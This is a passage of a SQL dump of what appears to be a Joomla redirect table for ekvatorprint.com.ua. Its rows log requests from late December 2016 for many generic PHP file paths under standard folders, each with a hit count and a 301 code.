00:00:00',301),(2789,'http://ekvatorprint.com.ua/includes/menu.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:28:07','0000-00-00 00:00:00',301),(2790,'http://ekvatorprint.com.ua/plugins/gallery.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:28:37','0000-00-00 00:00:00',301),(2791,'http://ekvatorprint.com.ua/modules/header.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:28:49','0000-00-00 00:00:00',301),(2792,'http://ekvatorprint.com.ua/images/object.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:29:35','0000-00-00 00:00:00',301),(2793,'http://ekvatorprint.com.ua/plugins/proxy.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:29:52','0000-00-00 00:00:00',301),(2794,'http://ekvatorprint.com.ua/administrator/xml.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:29:55','0000-00-00 00:00:00',301),(2795,'http://ekvatorprint.com.ua/templates/start.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:30:07','0000-00-00 00:00:00',301),(2796,'http://ekvatorprint.com.ua/plugins/test.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:32:00','0000-00-00 00:00:00',301),(2797,'http://ekvatorprint.com.ua/plugins/xml.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:33:06','0000-00-00 00:00:00',301),(2798,'http://ekvatorprint.com.ua/templates/ini.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:33:42','0000-00-00 00:00:00',301),(2799,'http://ekvatorprint.com.ua/includes/diff.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:34:19','0000-00-00 00:00:00',301),(2800,'http://ekvatorprint.com.ua/administrator/gallery.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:37:23','0000-00-00 00:00:00',301),(2801,'http://ekvatorprint.com.ua/plugins/ini.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:37:30','0000-00-00 00:00:00',301),(2802,'http://ekvatorprint.com.ua/libraries/header.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:39:21','0000-00-00 00:00:00',301),(2803,'http://ekvatorprint.com.ua/templates/object.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:41:52','0000-00-00 00:00:00',301),(2804,'http://ekvatorprint.com.ua/templates/test.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:42:13','0000-00-00 00:00:00',301),(2805,'http://ekvatorprint.com.ua/includes/ajax.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:42:58','0000-00-00 00:00:00',301),(2806,'http://ekvatorprint.com.ua/administrator/lib.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:43:08','0000-00-00 00:00:00',301),(2807,'http://ekvatorprint.com.ua/plugins/article.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:43:17','0000-00-00 00:00:00',301),(2808,'http://ekvatorprint.com.ua/administrator/ajax.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:43:23','0000-00-00 00:00:00',301),(2809,'http://ekvatorprint.com.ua/images/title.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:43:32','0000-00-00 00:00:00',301),(2810,'http://ekvatorprint.com.ua/components/system.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:45:58','0000-00-00 00:00:00',301),(2811,'http://ekvatorprint.com.ua/media/title.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:45:58','0000-00-00 00:00:00',301),(2812,'http://ekvatorprint.com.ua/media/article.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:46:00','0000-00-00 00:00:00',301),(2813,'http://ekvatorprint.com.ua/media/javascript.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:46:37','0000-00-00 00:00:00',301),(2814,'http://ekvatorprint.com.ua/media/ini.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:47:24','0000-00-00 00:00:00',301),(2815,'http://ekvatorprint.com.ua/administrator/file.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:47:34','0000-00-00 00:00:00',301),(2816,'http://ekvatorprint.com.ua/includes/options.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:47:37','0000-00-00 00:00:00',301),(2817,'http://ekvatorprint.com.ua/modules/menu.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:48:01','0000-00-00 00:00:00',301),(2818,'http://ekvatorprint.com.ua/administrator/menu.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:48:26','0000-00-00 00:00:00',301),(2819,'http://ekvatorprint.com.ua/administrator/sql.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:48:33','0000-00-00 00:00:00',301),(2820,'http://ekvatorprint.com.ua/plugins/object.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:48:41','0000-00-00 00:00:00',301),(2821,'http://ekvatorprint.com.ua/libraries/admin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:48:51','0000-00-00 00:00:00',301),(2822,'http://ekvatorprint.com.ua/images/functions.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:50:19','0000-00-00 00:00:00',301),(2823,'http://ekvatorprint.com.ua/libraries/system.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:50:31','0000-00-00 00:00:00',301),(2824,'http://ekvatorprint.com.ua/includes/dir.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:50:55','0000-00-00 00:00:00',301),(2825,'http://ekvatorprint.com.ua/media/session.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:51:17','0000-00-00 00:00:00',301),(2826,'http://ekvatorprint.com.ua/libraries/defines.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:51:38','0000-00-00 00:00:00',301),(2827,'http://ekvatorprint.com.ua/libraries/view.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:51:54','0000-00-00 00:00:00',301),(2828,'http://ekvatorprint.com.ua/modules/ini.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:52:05','0000-00-00 00:00:00',301),(2829,'http://ekvatorprint.com.ua/templates/list.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:52:07','0000-00-00 00:00:00',301),(2830,'http://ekvatorprint.com.ua/modules/error.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:53:10','0000-00-00 00:00:00',301),(2831,'http://ekvatorprint.com.ua/images/javascript.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:55:13','0000-00-00 00:00:00',301),(2832,'http://ekvatorprint.com.ua/images/lib.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:55:39','0000-00-00 00:00:00',301),(2833,'http://ekvatorprint.com.ua/components/xml.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:55:56','0000-00-00 00:00:00',301),(2834,'http://ekvatorprint.com.ua/components/diff.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:56:27','0000-00-00 00:00:00',301),(2835,'http://ekvatorprint.com.ua/administrator/include.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:56:42','0000-00-00 00:00:00',301),(2836,'http://ekvatorprint.com.ua/plugins/search.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:56:48','0000-00-00 00:00:00',301),(2837,'http://ekvatorprint.com.ua/images/dir.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:56:51','0000-00-00 00:00:00',301),(2838,'http://ekvatorprint.com.ua/plugins/user.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:56:54','0000-00-00 00:00:00',301),(2839,'http://ekvatorprint.com.ua/administrator/ini.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-29 02:57:01','0000-00-00 00:00:00',301),(2840,'http://ekvatorprint.com.ua/templates/option.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:57:44','0000-00-00 00:00:00',301),(2841,'http://ekvatorprint.com.ua/templates/title.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:58:26','0000-00-00 00:00:00',301),(2842,'http://ekvatorprint.com.ua/images/system.php',NULL,'ekvatorprint.com.ua','',3,0,'2016-12-29 02:58:51','0000-00-00 00:00:00',301),(2843,'http://ekvatorprint.com.ua/includes/title.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:59:10','0000-00-00 00:00:00',301),(2844,'http://ekvatorprint.com.ua/administrator/press.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:59:42','0000-00-00 00:00:00',301),(2845,'http://ekvatorprint.com.ua/plugins/javascript.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:59:42','0000-00-00 00:00:00',301),(2846,'http://ekvatorprint.com.ua/images/stats.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:00:05','0000-00-00 00:00:00',301),(2847,'http://ekvatorprint.com.ua/media/start.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:00:10','0000-00-00 00:00:00',301),(2848,'http://ekvatorprint.com.ua/components/page.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:00:18','0000-00-00 00:00:00',301),(2849,'http://ekvatorprint.com.ua/includes/header.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:00:18','0000-00-00 00:00:00',301),(2850,'http://ekvatorprint.com.ua/includes/login.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:00:20','0000-00-00 00:00:00',301),(2851,'http://ekvatorprint.com.ua/modules/page.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:00:31','0000-00-00 00:00:00',301),(2852,'http://ekvatorprint.com.ua/plugins/page.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:01:01','0000-00-00 00:00:00',301),(2853,'http://ekvatorprint.com.ua/includes/list.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:01:36','0000-00-00 00:00:00',301),(2854,'http://ekvatorprint.com.ua/administrator/dirs.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:01:54','0000-00-00 00:00:00',301),(2855,'http://ekvatorprint.com.ua/includes/test.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:02:48','0000-00-00 00:00:00',301),(2856,'http://ekvatorprint.com.ua/modules/system.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:03:23','0000-00-00 00:00:00',301),(2857,'http://ekvatorprint.com.ua/components/include.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:03:32','0000-00-00 00:00:00',301),(2858,'http://ekvatorprint.com.ua/media/ajax.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:04:20','0000-00-00 00:00:00',301),(2859,'http://ekvatorprint.com.ua/administrator/admin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:04:47','0000-00-00 00:00:00',301),(2860,'http://ekvatorprint.com.ua/libraries/ini.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:06:02','0000-00-00 00:00:00',301),(2861,'http://ekvatorprint.com.ua/administrator/plugin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:06:06','0000-00-00 00:00:00',301),(2862,'http://ekvatorprint.com.ua/templates/proxy.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:06:32','0000-00-00 00:00:00',301),(2863,'http://ekvatorprint.com.ua/plugins/footer.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:06:40','0000-00-00 00:00:00',301),(2864,'http://ekvatorprint.com.ua/templates/ajax.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:06:52','0000-00-00 00:00:00',301),(2865,'http://ekvatorprint.com.ua/plugins/header.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:07:26','0000-00-00 00:00:00',301),(2866,'http://ekvatorprint.com.ua/components/general.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:08:26','0000-00-00 00:00:00',301),(2867,'http://ekvatorprint.com.ua/components/header.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:08:42','0000-00-00 00:00:00',301),(2868,'http://ekvatorprint.com.ua/modules/sql.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:08:53','0000-00-00 00:00:00',301),(2869,'http://ekvatorprint.com.ua/libraries/session.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:09:15','0000-00-00 00:00:00',301),(2870,'http://ekvatorprint.com.ua/media/object.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:09:35','0000-00-00 00:00:00',301),(2871,'http://ekvatorprint.com.ua/modules/code.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:10:55','0000-00-00 00:00:00',301),(2872,'http://ekvatorprint.com.ua/media/system.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:10:57','0000-00-00 00:00:00',301),(2873,'http://ekvatorprint.com.ua/plugins/stats.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:10:59','0000-00-00 00:00:00',301),(2874,'http://ekvatorprint.com.ua/images/ajax.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:11:02','0000-00-00 00:00:00',301),(2875,'http://ekvatorprint.com.ua/media/lib.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:11:27','0000-00-00 00:00:00',301),(2876,'http://ekvatorprint.com.ua/images/view.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:11:30','0000-00-00 00:00:00',301),(2877,'http://ekvatorprint.com.ua/plugins/defines.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:12:47','0000-00-00 00:00:00',301),(2878,'http://ekvatorprint.com.ua/components/gallery.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:14:08','0000-00-00 00:00:00',301),(2879,'http://ekvatorprint.com.ua/components/template.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:14:10','0000-00-00 00:00:00',301),(2880,'http://ekvatorprint.com.ua/includes/config.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:14:42','0000-00-00 00:00:00',301),(2881,'http://ekvatorprint.com.ua/templates/error.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:14:45','0000-00-00 00:00:00',301),(2882,'http://ekvatorprint.com.ua/libraries/template.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:14:56','0000-00-00 00:00:00',301),(2883,'http://ekvatorprint.com.ua/images/general.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:15:04','0000-00-00 00:00:00',301),(2884,'http://ekvatorprint.com.ua/media/view.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:15:22','0000-00-00 00:00:00',301),(2885,'http://ekvatorprint.com.ua/administrator/css.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:15:53','0000-00-00 00:00:00',301),(2886,'http://ekvatorprint.com.ua/components/model.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:16:12','0000-00-00 00:00:00',301),(2887,'http://ekvatorprint.com.ua/libraries/utf.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:17:01','0000-00-00 00:00:00',301),(2888,'http://ekvatorprint.com.ua/libraries/options.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:17:03','0000-00-00 00:00:00',301),(2889,'http://ekvatorprint.com.ua/administrator/search.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:17:08','0000-00-00 00:00:00',301),(2890,'http://ekvatorprint.com.ua/components/footer.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:17:27','0000-00-00 00:00:00',301),(2891,'http://ekvatorprint.com.ua/plugins/db.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:17:28','0000-00-00 00:00:00',301),(2892,'http://ekvatorprint.com.ua/media/option.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:17:57','0000-00-00 00:00:00',301),(2893,'http://ekvatorprint.com.ua/plugins/view.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:18:06','0000-00-00 00:00:00',301),(2894,'http://ekvatorprint.com.ua/administrator/options.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:18:09','0000-00-00 00:00:00',301),(2895,'http://ekvatorprint.com.ua/includes/footer.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:18:46','0000-00-00 00:00:00',301),(2896,'http://ekvatorprint.com.ua/plugins/start.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:18:53','0000-00-00 00:00:00',301),(2897,'http://ekvatorprint.com.ua/media/menu.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:19:28','0000-00-00 00:00:00',301),(2898,'http://ekvatorprint.com.ua/images/session.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:19:56','0000-00-00 00:00:00',301),(2899,'http://ekvatorprint.com.ua/images/xml.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-29 03:20:10','0000-00-00 00:00:00',301),(2900,'http://ekvatorprint.com.ua/images/global.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:20:35','0000-00-00 00:00:00',301),(2901,'http://ekvatorprint.com.ua/components/lib.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:20:37','0000-00-00 00:00:00',301),(2902,'http://ekvatorprint.com.ua/includes/blog.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:21:53','0000-00-00 00:00:00',301),(2903,'http://ekvatorprint.com.ua/plugins/global.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:22:09','0000-00-00 00:00:00',301),(2904,'http://ekvatorprint.com.ua/modules/alias.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:22:13','0000-00-00 00:00:00',301),(2905,'http://ekvatorprint.com.ua/components/inc.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:22:35','0000-00-00 00:00:00',301),(2906,'http://ekvatorprint.com.ua/media/functions.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:22:36','0000-00-00 00:00:00',301),(2907,'http://ekvatorprint.com.ua/templates/db.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:23:41','0000-00-00 00:00:00',301),(2908,'http://ekvatorprint.com.ua/administrator/title.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:23:47','0000-00-00 00:00:00',301),(2909,'http://ekvatorprint.com.ua/administrator/test.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:23:56','0000-00-00 00:00:00',301),(2910,'http://ekvatorprint.com.ua/components/files.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:24:28','0000-00-00 00:00:00',301),(2911,'http://ekvatorprint.com.ua/media/test.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:25:27','0000-00-00 00:00:00',301),(2912,'http://ekvatorprint.com.ua/images/plugin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:26:02','0000-00-00 00:00:00',301),(2913,'http://ekvatorprint.com.ua/libraries/file.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:27:11','0000-00-00 00:00:00',301),(2914,'http://ekvatorprint.com.ua/administrator/start.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:27:25','0000-00-00 00:00:00',301),(2915,'http://ekvatorprint.com.ua/templates/functions.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:27:56','0000-00-00 00:00:00',301),(2916,'http://ekvatorprint.com.ua/media/error.php',NULL,'ekvatorprint.com.ua','',5,0,'2016-12-29 03:28:48','0000-00-00 00:00:00',301),(2917,'http://ekvatorprint.com.ua/libraries/start.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:28:55','0000-00-00 00:00:00',301),(2918,'http://ekvatorprint.com.ua/libraries/alias.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:28:57','0000-00-00 00:00:00',301),(2919,'http://ekvatorprint.com.ua/images/article.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:29:24','0000-00-00 00:00:00',301),(2920,'http://ekvatorprint.com.ua/modules/login.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:29:40','0000-00-00 00:00:00',301),(2921,'http://ekvatorprint.com.ua/templates/session.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:29:45','0000-00-00 00:00:00',301),(2922,'http://ekvatorprint.com.ua/components/ajax.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:29:58','0000-00-00 00:00:00',301),(2923,'http://ekvatorprint.com.ua/includes/proxy.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:30:01','0000-00-00 00:00:00',301),(2924,'http://ekvatorprint.com.ua/administrator/themes.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-29 03:32:01','0000-00-00 00:00:00',301),(2925,'http://ekvatorprint.com.ua/administrator/user.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:32:09','0000-00-00 00:00:00',301),(2926,'http://ekvatorprint.com.ua/administrator/error.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:32:25','0000-00-00 00:00:00',301),(2927,'http://ekvatorprint.com.ua/templates/footer.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:32:44','0000-00-00 00:00:00',301),(2928,'http://ekvatorprint.com.ua/libraries/blog.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:32:51','0000-00-00 00:00:00',301),(2929,'http://ekvatorprint.com.ua/media/config.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:32:57','0000-00-00 00:00:00',301),(2930,'http://ekvatorprint.com.ua/libraries/article.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:33:21','0000-00-00 00:00:00',301),(2931,'http://ekvatorprint.com.ua/plugins/dir.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:34:25','0000-00-00 00:00:00',301),(2932,'http://ekvatorprint.com.ua/plugins/option.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:34:31','0000-00-00 00:00:00',301),(2933,'http://ekvatorprint.com.ua/modules/press.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:34:40','0000-00-00 00:00:00',301),(2934,'http://ekvatorprint.com.ua/templates/diff.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:34:42','0000-00-00 00:00:00',301),(2935,'http://ekvatorprint.com.ua/templates/global.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:35:21','0000-00-00 00:00:00',301),(2936,'http://ekvatorprint.com.ua/libraries/dir.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:35:35','0000-00-00 00:00:00',301),(2937,'http://ekvatorprint.com.ua/images/files.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:35:40','0000-00-00 00:00:00',301),(2938,'http://ekvatorprint.com.ua/components/utf.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:36:00','0000-00-00 00:00:00',301),(2939,'http://ekvatorprint.com.ua/modules/include.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:36:40','0000-00-00 00:00:00',301),(2940,'http://ekvatorprint.com.ua/libraries/global.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:36:42','0000-00-00 00:00:00',301),(2941,'http://ekvatorprint.com.ua/media/stats.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:36:50','0000-00-00 00:00:00',301),(2942,'http://ekvatorprint.com.ua/modules/css.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:37:08','0000-00-00 00:00:00',301),(2943,'http://ekvatorprint.com.ua/libraries/xml.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:38:27','0000-00-00 00:00:00',301),(2944,'http://ekvatorprint.com.ua/libraries/include.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:38:45','0000-00-00 00:00:00',301),(2945,'http://ekvatorprint.com.ua/images/diff.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:39:30','0000-00-00 00:00:00',301),(2946,'http://ekvatorprint.com.ua/includes/themes.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:39:48','0000-00-00 00:00:00',301),(2947,'http://ekvatorprint.com.ua/libraries/ajax.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:40:39','0000-00-00 00:00:00',301),(2948,'http://ekvatorprint.com.ua/components/functions.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:40:53','0000-00-00 00:00:00',301),(2949,'http://ekvatorprint.com.ua/libraries/help.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:41:18','0000-00-00 00:00:00',301),(2950,'http://ekvatorprint.com.ua/administrator/inc.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:41:19','0000-00-00 00:00:00',301),(2951,'http://ekvatorprint.com.ua/includes/start.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:41:28','0000-00-00 00:00:00',301),(2952,'http://ekvatorprint.com.ua/plugins/file.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:41:28','0000-00-00 00:00:00',301),(2953,'http://ekvatorprint.com.ua/libraries/gallery.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:41:30','0000-00-00 00:00:00',301),(2954,'http://ekvatorprint.com.ua/includes/db.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:42:59','0000-00-00 00:00:00',301),(2955,'http://ekvatorprint.com.ua/libraries/cache.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:43:13','0000-00-00 00:00:00',301),(2956,'http://ekvatorprint.com.ua/images/include.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:43:13','0000-00-00 00:00:00',301),(2957,'http://ekvatorprint.com.ua/templates/header.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:43:43','0000-00-00 00:00:00',301),(2958,'http://ekvatorprint.com.ua/media/inc.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:44:37','0000-00-00 00:00:00',301),(2959,'http://ekvatorprint.com.ua/modules/admin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:45:02','0000-00-00 00:00:00',301),(2960,'http://ekvatorprint.com.ua/components/css.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:46:45','0000-00-00 00:00:00',301),(2961,'http://ekvatorprint.com.ua/libraries/proxy.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:47:09','0000-00-00 00:00:00',301),(2962,'http://ekvatorprint.com.ua/includes/template.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:48:01','0000-00-00 00:00:00',301),(2963,'http://ekvatorprint.com.ua/images/press.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:48:14','0000-00-00 00:00:00',301),(2964,'http://ekvatorprint.com.ua/includes/ini.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:48:50','0000-00-00 00:00:00',301),(2965,'http://ekvatorprint.com.ua/components/sql.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:48:57','0000-00-00 00:00:00',301),(2966,'http://ekvatorprint.com.ua/includes/javascript.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:49:01','0000-00-00 00:00:00',301),(2967,'http://ekvatorprint.com.ua/media/admin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:49:20','0000-00-00 00:00:00',301),(2968,'http://ekvatorprint.com.ua/media/files.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:49:34','0000-00-00 00:00:00',301),(2969,'http://ekvatorprint.com.ua/templates/include.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:49:42','0000-00-00 00:00:00',301),(2970,'http://ekvatorprint.com.ua/modules/gallery.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:51:16','0000-00-00 00:00:00',301),(2971,'http://ekvatorprint.com.ua/plugins/diff.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:51:47','0000-00-00 00:00:00',301),(2972,'http://ekvatorprint.com.ua/media/diff.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:51:58','0000-00-00 00:00:00',301),(2973,'http://ekvatorprint.com.ua/modules/stats.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:52:37','0000-00-00 00:00:00',301),(2974,'http://ekvatorprint.com.ua/administrator/utf.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:52:40','0000-00-00 00:00:00',301),(2975,'http://ekvatorprint.com.ua/modules/cache.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:53:04','0000-00-00 00:00:00',301),(2976,'http://ekvatorprint.com.ua/modules/proxy.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:53:51','0000-00-00 